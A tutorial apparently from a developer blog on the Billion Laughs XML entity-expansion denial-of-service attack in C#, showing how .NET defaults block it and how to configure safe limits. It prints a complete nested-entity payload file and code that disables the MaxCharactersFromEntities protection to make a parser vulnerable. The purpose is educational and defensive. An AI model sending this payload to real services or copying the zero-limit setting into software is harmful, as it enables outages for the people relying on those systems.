"lol" is the usual expression we type in chats when something is pretty funny. However, someone discovered an interesting flaw in XML parsers and decided to laugh right in their faces. The Billion Laughs attack is a denial-of-service attack that targets XML parsers that support Document Type Definitions (DTD) and expand the entities declared in them. It is also known as an XML bomb or an exponential entity expansion attack.
How does it work?
First you need to understand the concept of entities in XML. An XML entity is a symbolic representation of data, just like a variable in a piece of code. Entities must be declared in the Document Type Definition (DTD), just like an element or an attribute. For example:
<!ENTITY cheese "Mozarella and Cheddar">
The parser replaces the entity cheese wherever you reference it by name, with an ampersand as prefix and a semicolon as suffix:
<somenode>My Favorite cheeses are: &cheese;</somenode>
When an XML parser finds the entity reference, it expands it, which in this case results in "<somenode>My Favorite cheeses are: Mozarella and Cheddar</somenode>". If the entity definition contains references to other entities, these have to be expanded as well, for example:
<!ENTITY cheese "Mozarella and Cheddar">
<!ENTITY burgerRecipe "Meat, Tomato, Onion, &cheese;">
So the burgerRecipe entity will expand to "Meat, Tomato, Onion, Mozarella and Cheddar". That is exactly how this attack works: an entity references another entity several times, which in turn references another one several times, and so on, so the expanded text grows exponentially. This kind of attack works with perfectly well-formed XML; the document is simply designed to abuse the parser. It can also be tricky to detect, especially when real data is mixed in, and difficult to mitigate when you work with multiple XML parsers.
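To watch the expansion happen, here is a minimal sketch that parses the two entities above from an in-memory string. The EntityDemo class, the Expand helper and the <menu> root element are names made up for this illustration. DTD processing is switched on explicitly in the settings, because a reader created with the default settings refuses documents that carry a DTD.

```csharp
using System;
using System.IO;
using System.Xml;

public static class EntityDemo
{
    // Hypothetical helper: returns the text of the root element after the
    // parser has expanded every entity reference inside it.
    public static string Expand(string xml)
    {
        var settings = new XmlReaderSettings
        {
            // Needed so the internal DTD (and its entities) is processed.
            DtdProcessing = DtdProcessing.Parse
        };

        using (var reader = XmlReader.Create(new StringReader(xml), settings))
        {
            reader.MoveToContent();                     // skip the declaration and the DOCTYPE
            return reader.ReadElementContentAsString(); // text arrives with entities expanded
        }
    }

    public static void Main()
    {
        const string xml = @"<?xml version=""1.0""?>
<!DOCTYPE menu [
<!ENTITY cheese ""Mozarella and Cheddar"">
<!ENTITY burgerRecipe ""Meat, Tomato, Onion, &cheese;"">
]>
<menu>&burgerRecipe;</menu>";

        Console.WriteLine(Expand(xml));
    }
}
```

Running it should print the fully expanded recipe, with &cheese; already replaced inside &burgerRecipe;. Nothing in the document asks for the expansion; the parser does it on its own, which is what the attack abuses.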
In this article, we will show you how to perform a Billion Laughs XML DoS attack against the default XML parsers of C# and how to prevent it.
Trying to DoS yourself
In order to reproduce this kind of attack in a safe environment (your local computer), create a new XML file named billion_laugh.xml on the Desktop of your computer. This file will contain the following data:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
<!ENTITY lol11 "&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;">
<!ENTITY lol12 "&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;">
<!ENTITY lol13 "&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;">
<!ENTITY lol14 "&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;">
<!ENTITY lol15 "&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;">
]>
<lolz>&lol15;</lolz>
This file is an exaggerated version of the attack. Each new entity is defined as nine or ten copies of the previous one, so the amount of text grows exponentially. When the parser tries to print the value of the entity lol15, it is expanded into 9 lol14’s, each of which is expanded into 9 lol13’s, and so on and so forth. By the time everything is expanded down to the text lol, there are 10^9 × 9^5 copies of it, roughly 59 trillion instances of the string lol, far more than the billion that gives the attack its name.
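The size of the expansion can be checked with a few lines of arithmetic. The sketch below is not part of the attack; LaughCounter and CountCopies are hypothetical names, and the fan-out values were counted by hand from the file above (lol2 to lol10 reference the previous entity 10 times, lol11 to lol15 only 9 times).

```csharp
using System;

public static class LaughCounter
{
    // Multiplies the number of references each entity makes to the previous one.
    // The result is how many copies of the innermost entity the last one expands to.
    public static long CountCopies(int[] fanOut)
    {
        long copies = 1;
        foreach (int n in fanOut)
        {
            copies = checked(copies * n); // throw instead of silently overflowing
        }
        return copies;
    }

    public static void Main()
    {
        // Assumption of this sketch: fan-out counted by hand from the file above.
        int[] fanOut = { 10, 10, 10, 10, 10, 10, 10, 10, 10, 9, 9, 9, 9, 9 };

        long copies = CountCopies(fanOut);
        long characters = checked(copies * "lol".Length);

        Console.WriteLine($"{copies:N0} copies of \"lol\", {characters:N0} characters");
    }
}
```

A file of about a kilobyte therefore asks the parser for well over a hundred trillion characters of output, which is why no realistic amount of memory or patience is enough.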
Now, for the XML parser, we will use the simplest way to read an XML file, the XmlDocument class of .NET. The XmlDocument class is an in-memory representation of an XML document. It implements the W3C XML Document Object Model (DOM) Level 1 Core and the Core DOM Level 2. You can read the XML file with the following code:
using System.Xml;
// 1. Create instance of a XmlDocument
XmlDocument doc = new XmlDocument();
// 2. Load the file directly. This parses the entire file immediately!
doc.Load("C:\\Users\\sdkca\\Desktop\\billion_laugh.xml");
In our project, this code is executed when the user clicks on a button. When we press it, Visual Studio gets slow and the following exception is thrown:
System.Xml.XmlException: 'The input document has exceeded a limit set by MaxCharactersFromEntities.'
Besides the clear exception, you will also see an interesting behaviour in the memory used by the process. Initially, with something as basic as a form and a button, it only uses around 17 MB of RAM and barely 1% of the processor. But when the user clicks on the button to read the XML file, the memory (102 MB) and processor (17%) usage increase drastically.
The conclusion of the first example is that the default class that a lot of developers use to read XML quickly already imposes a limit on the number of characters that may result from expanding entities (MaxCharactersFromEntities), preventing your PC from exploding and destroying your house (just kidding).
Trying to DoS yourself, the comeback
For our second attempt to break our C# application, we will create an instance of the XmlReader and load the file. Using the reader, we will try to process the nodes of the file with the following code:
using System.Xml;
// 1. Create an instance of the XmlReader and load file
XmlReader reader = XmlReader.Create("C:\\Users\\sdkca\\Desktop\\billion_laugh.xml");
// At this point the parser hasn't processed the file yet, it only does so when you read from it
using (reader)
{
while (reader.Read())
{
// 2. Read at least the first element of the XML
if (reader.IsStartElement()){}
}
}
Once again, running the previous code will trigger another exception that will prevent our app from freezing:
System.Xml.XmlException: 'For security reasons DTD is prohibited in this XML document. To enable DTD processing set the DtdProcessing property on XmlReaderSettings to Parse and pass the settings into XmlReader.Create method.'
The framework saved our asses once again. DTD stands for Document Type Definition, which defines the legal building blocks of an XML document. It's usually used to define the document structure with a list of legal elements and attributes. An XmlReader created with the default settings prohibits DTDs, so the document is rejected before a single entity is expanded. We failed once again.
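The default behaviour is easy to confirm with a harmless document. This is a small sketch under assumptions: DefaultSettingsDemo and IsRejected are invented names, and the two test strings are made up for the occasion. Note that the helper treats any XmlException as a rejection, so malformed XML would be reported the same way.

```csharp
using System;
using System.IO;
using System.Xml;

public static class DefaultSettingsDemo
{
    // Hypothetical helper: tries to read the whole document with the default
    // XmlReader settings and reports whether the parser refused it.
    public static bool IsRejected(string xml)
    {
        try
        {
            using (var reader = XmlReader.Create(new StringReader(xml)))
            {
                while (reader.Read()) { } // force the parser through the document
            }
            return false;
        }
        catch (XmlException)
        {
            return true;
        }
    }

    public static void Main()
    {
        const string withDtd = "<!DOCTYPE note [<!ENTITY a \"b\">]><note>&a;</note>";
        const string withoutDtd = "<note>b</note>";

        Console.WriteLine(IsRejected(withDtd));    // True: the DOCTYPE alone is enough
        Console.WriteLine(IsRejected(withoutDtd)); // False: plain XML is read normally
    }
}
```

Even a DTD with a single one-character entity is refused, so with default settings the size of the bomb never matters.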
Trying to DoS yourself, the vengeance
As a final try, and as the previous exception hinted, we can simply enable DTD processing so that our attack really gets executed. However, there's an extra protection that .NET enables automatically, the MaxCharactersFromEntities property. This property defines a value indicating the maximum allowable number of characters in a document that result from expanding entities.
A zero (0) value means no limits on the number of characters that result from expanding entities. A non-zero value specifies the maximum number of characters that can result from expanding entities. If the reader attempts to read a document that contains entities such that the expanded size will exceed this property, an XmlException will be thrown.
This property allows you to mitigate denial of service attacks where the attacker submits XML documents that attempt to exceed memory limits via expanding entities. By limiting the characters that result from expanded entities, you can detect the attack and recover reliably. So, if we really want to be vulnerable to this attack, we simply set this property to 0, as in the code below. Remember that this is just for educational purposes: never set the MaxCharactersFromEntities property to 0 unless you know what you're doing.
using System.Xml;
// 1. Create custom settings for the XML parser
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Parse;
// Warning: this value should never be 0, this will make your app
// vulnerable to this kind of attack.
// A normal value would be 1024
settings.MaxCharactersFromEntities = 0;
// 2. Create an instance of the XmlReader and load file with custom settings.
XmlReader reader = XmlReader.Create("C:\\Users\\sdkca\\Desktop\\billion_laugh.xml", settings);
// At this point the parser hasn't processed the file yet, it only does so when you read from it
using (reader)
{
while (reader.Read())
{
if (reader.IsStartElement()) { }
}
}
And finally! We have just blocked the interface of the application, so we successfully DoS'd ourselves. The application won't respond anymore, so you will need to restart it or stop it with Visual Studio. Another interesting behaviour can be observed during the execution: the memory usage remains stable, presumably because the XmlReader streams the document and our loop discards every node instead of keeping the expanded text in memory. We waited for 10 minutes, but our application never reacted, so we just gave up!
Final thoughts
In recent versions of the .NET Framework, the default settings already protect us from this attack. If we do receive an XML file that legitimately requires such expansion, we should recommend that its author move to plain data instead of using entities. If you use custom settings through the XmlReaderSettings class, don't forget to set the MaxCharactersFromEntities property to a reasonable value before reading XML files with DTD:
using System.Xml;
// 1. Create custom settings for the XML parser
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Parse;
// Prevent DoS attacks
settings.MaxCharactersFromEntities = 1024;
// 2. Create an instance of the XmlReader and load file with custom settings.
XmlReader reader = XmlReader.Create("C:\\Users\\sdkca\\Desktop\\myxmlfile.xml", settings);
// At this point the parser hasn't processed the file yet, it only does so when you read from it
using (reader)
{
// The parser will read without any problem !!!
while (reader.Read())
{
if (reader.IsStartElement()) { }
}
}
This protects you from the DoS attack while still allowing you to read XML files with a DTD, which are prohibited by default.
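If you want the application to keep running when a hostile file shows up, the reading loop can be wrapped so that the XmlException is handled in one place. The following is only a sketch: GuardedReader, TryRead and the tiny three-level test document are invented for this example, and the two limits (10 and 1,000,000) are arbitrary values chosen to show both outcomes.

```csharp
using System;
using System.IO;
using System.Xml;

public static class GuardedReader
{
    // Hypothetical helper: reads the document with DTDs enabled but with a cap
    // on entity expansion. Returns false when the parser rejects the input.
    public static bool TryRead(string xml, long maxEntityChars)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Parse,
            MaxCharactersFromEntities = maxEntityChars
        };

        try
        {
            using (var reader = XmlReader.Create(new StringReader(xml), settings))
            {
                while (reader.Read()) { } // walk through every node
            }
            return true;
        }
        catch (XmlException ex)
        {
            Console.WriteLine("Rejected: " + ex.Message);
            return false;
        }
    }

    public static void Main()
    {
        // A deliberately tiny "bomb": lol3 expands to 100 copies of "lol".
        const string xml = @"<!DOCTYPE lolz [
<!ENTITY lol ""lol"">
<!ENTITY lol2 ""&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"">
<!ENTITY lol3 ""&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"">
]>
<lolz>&lol3;</lolz>";

        Console.WriteLine(TryRead(xml, 10));      // limit far below the expansion
        Console.WriteLine(TryRead(xml, 1000000)); // limit far above the expansion
    }
}
```

With the low limit the document should be refused, and with the generous one it should be read normally. Returning a boolean keeps the caller simple; in a real application you would probably log the message and show the user an error instead of writing to the console.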
Happy coding !